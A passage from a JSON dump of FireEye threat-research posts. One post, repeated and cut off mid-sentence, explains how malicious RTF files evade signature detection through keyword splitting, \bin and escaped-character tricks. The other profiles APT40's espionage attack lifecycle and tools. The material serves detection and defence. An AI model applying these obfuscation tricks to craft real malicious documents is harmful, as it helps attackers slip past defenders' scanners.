"2020-04-27T12:30:00", "id": "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "href": "https://www.fireeye.com/blog/threat-research/2020/04/enabling-defenders-with-vulnerability-intelligence.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-17T14:44:05", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 
years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parser challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple of different RTF obfuscation strategies.\n\n**1\\. 
CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n`{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}}`\n\nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. 
Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature-based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nMany other variations on this sample could be devised to defeat static signature-based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed a variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE-related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. 
The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the characters 123 will be treated as binary data and hence translated into the hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the long numeric parameter string that follows \\bin in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The whitespace characters 0x0D (\\r), 0x0A (\\n) and 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. 
For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. 
Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. 
\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. The RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nThe RTF parser also recognizes \\datastore and knows that it accepts data, therefore the data that follows will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to an OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed to by lpolestream contains a pointer to the OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data, which has already been de-obfuscated by the RTF parser:\n\n\n\nThe last command, .writemem, writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images there seems to be no single function as convenient as OleConvertOLESTREAMToIStorage. 
To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "edition": 2, "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T10:01:23", "description": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China\u2019s naval modernization effort. 
The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.\n\n#### Mission\n\nIn December 2016, China\u2019s People\u2019s Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China\u2019s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40\u2019s emphasis on maritime issues and naval technology ultimately supports China\u2019s ambition to establish a blue-water navy.\n\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most recently, this has included [victims with connections to elections](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) in Southeast Asia, which is likely driven by events affecting China\u2019s Belt and Road Initiative. 
China\u2019s \u201cOne Belt, One Road\u201d (\u4e00\u5e26\u4e00\u8def) or \u201cBelt and Road Initiative\u201d (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China\u2019s influence across the greater region.\n\n \nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia\n\n#### Attribution\n\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor\u2019s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group\u2019s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process.\n\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an [open indexed server](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. 
All of the logins to this C2 were from computers configured with Chinese language settings.\n\n#### Attack Lifecycle\n\n_Initial Compromise_\n\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.\n\n * APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.\n * The operation\u2019s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.\n * APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:\n * [CVE-2012-0158](<https://intelligence.fireeye.com/reports/12-19517>)\n * [CVE-2017-0199](<https://intelligence.fireeye.com/reports/17-00003493>)\n * [CVE-2017-8759](<https://intelligence.fireeye.com/reports/17-00010114>)\n * [CVE-2017-11882](<https://intelligence.fireeye.com/reports/17-00012724>)\n\n \nFigure 2: APT40 attack lifecycle\n\n_Establish Foothold_\n\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.\n\n * First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.\n * PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.\n * APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. 
This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.\n\n_Escalate Privileges_\n\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.\n\n * APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.\n * Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.\n\n_Internal Reconnaissance_\n\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\n\n * APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.\n * APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim\u2019s environment.\n * Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.\n\n_Lateral Movement_\n\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). 
For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.\n\n * APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.\n * Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\n * Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.\n * APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.\n\n_Maintain Presence_\n\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.\n\n * APT40 strongly favors web shells for maintaining presence, especially publicly available tools.\n * Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.\n * Some APT40 malware tools can evade typical network detection by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications.\n * Common TCP ports 80 and 443 are used to blend in with routine network traffic.\n\n_Complete Mission_\n\nCompleting missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. 
We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.\n\n#### Outlook and Implications\n\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40\u2019s broadening into election-related targets in 2017, we assess with moderate confidence that the group\u2019s future targeting will affect additional sectors beyond maritime, driven by events such as China\u2019s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project\u2019s regional opponents.\n", "edition": 2, "cvss3": {}, "published": "2019-03-04T13:00:00", "type": "fireeye", "title": "APT40: Examining a China-Nexus Espionage Actor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8759"], "modified": "2019-03-04T13:00:00", "id": "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "href": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:18", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 
years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. 
CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. 
Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. 
The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. 
For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. 
Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol 